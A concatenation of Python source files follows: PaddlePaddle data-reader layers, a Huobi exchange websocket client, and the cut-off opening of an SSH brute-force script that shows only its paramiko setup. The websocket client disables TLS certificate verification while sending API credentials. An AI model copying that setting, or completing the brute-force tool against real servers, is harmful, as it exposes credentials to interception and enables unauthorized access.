for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
logging.warn('Your decorated reader has raised an exception!')
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source. More details :ref:`user_guide_use_py_reader_en` . When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regresssion example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
Works much like py_reader except that it's input is feed_list
instead of shapes, dtypes and lod_levels
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
import paddle.fluid.compiler as compiler
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
build_strategy.memory_optimize = True if MEMORY_OPT else False
compiled_prog = compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
exec_strategy=exec_strategy)
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
have name suffixs to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
thread_num(None): The number of thread to read files.
Default: min(len(filenames), cpu_number).
buffer_size(None): The buffer size of reader. Default: 3 * thread_num
pass_num(int): Number of passes to run.
is_test(bool|None): Whether `open_files` used for testing or not. If it
is used for testing, the order of data generated is same as the file
order. Otherwise, it is not guaranteed the order of data is same
between every epoch. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
Output from the iterator that created by original reader will be
buffered into shuffle buffer, and then shuffled. The size of shuffle buffer
is determined by argument buf_size.
Args:
reader(callable): the original reader whose output will be shuffled.
buf_size(int): shuffle buffer size.
Returns:
callable: the new reader whose output is shuffled.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
shuffle_reader = fluid.layers.shuffle(reader=batch_reader, buffer_size=5000)
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
'batching' decoration on it. When reading with the result
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.open_files(filenames=['mnist.recordio'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
from huobi.base.printtime import PrintDate
from huobi.constant.system import ApiVersion
from huobi.impl.utils.apisignaturev2 import create_signature_v2
from huobi.impl.utils.timeservice import get_current_timestamp
from huobi.impl.utils.urlparamsbuilder import UrlParamsBuilder
from huobi.impl.utils.apisignature import create_signature
from huobi.exception.huobiapiexception import HuobiApiException
from huobi.impl.utils import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
# threading.Thread.__init__(self)
self.__thread = None
self.__market_url = "wss://api.huobi.pro/ws"
self.__trading_url = "wss://api.huobi.pro/ws/" + request.api_version
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("huobi-client")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
host = urllib.parse.urlparse(uri).hostname
if host.find("api") == 0:
self.__market_url = "wss://" + host + "/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
else:
self.__market_url = "wss://" + host + "/api/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
if request.is_trading:
self.url = self.__trading_url
else:
self.url = self.__market_url
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting after "
+ str(self.delay_in_second) + " seconds later")
def re_connect(self):
if self.delay_in_second > 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
#print("sending data :", data)
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
#print("### open ###")
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.is_trading:
try:
if self.request.api_version == ApiVersion.VERSION_V1:
builder = UrlParamsBuilder()
create_signature(self.__api_key, self.__secret_key,
"GET", self.url, builder)
builder.put_url("op", "auth")
self.send(builder.build_url_to_json())
elif self.request.api_version == ApiVersion.VERSION_V2:
builder = UrlParamsBuilder()
create_signature_v2(self.__api_key, self.__secret_key,
"GET", self.url, builder)
self.send(builder.build_url_to_json())
else:
self.on_error("api version for create the signature fill failed")
except Exception as e:
self.on_error("Unexpected error when create the signature: " + str(e))
else:
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
exception = HuobiApiException(HuobiApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
if isinstance(message, (str)):
#print("RX string : ", message)
json_wrapper = parse_json_from_string(message)
elif isinstance(message, (bytes)):
#print("RX bytes: " + gzip.decompress(message).decode("utf-8"))
json_wrapper = parse_json_from_string(gzip.decompress(message).decode("utf-8"))
else:
print("RX unknow type : ", type(message))
return
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("op"):
op = json_wrapper.get_string("op")
if op == "notify":
self.__on_receive(json_wrapper)
elif op == "ping":
ping_ts = json_wrapper.get_string("ts")
self.__process_ping_on_trading_line(ping_ts)
elif op == "auth":
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
elif op == "req":
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("action"): # for V2
action_name = json_wrapper.get_string("action")
if action_name == "ping":
action_data = json_wrapper.get_object("data")
ping_ts = action_data.get_string("ts")
self.__process_ping_on_v2_trade(ping_ts)
elif action_name == "sub":
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("subscribe ACK received")
else:
logging.error("receive error data : " + message)
elif action_name == "req": #
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("signature ACK received")
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
else:
logging.error("receive error data : " + message)
elif action_name == "push":
action_data = json_wrapper.get_object("data")
if action_data:
self.__on_receive(json_wrapper)
else:
logging.error("receive error push data : " + message)
elif json_wrapper.contain_key("ch"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("rep"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("ping"):
ping_ts = json_wrapper.get_string("ping")
self.__process_ping_on_market_line(ping_ts)
else:
print("unknown data process, RX: " + gzip.decompress(message).decode("utf-8"))
def __on_receive(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
#self.send("{\"op\":\"pong\",\"ts\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
#self.send("{\"pong\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def __process_ping_on_v2_trade(self, ping_ts):
# PrintDate.timestamp_to_date(ping_ts)
self.send("{\"action\": \"pong\",\"data\": {\"ts\": " + str(ping_ts) +"}}")
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
sshbrutforce_extended.py
|
import socket
import threading, time
import paramiko, sys, os, termcolor
stop_flag = 0
def ssh_connect(password):
global stop_flag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
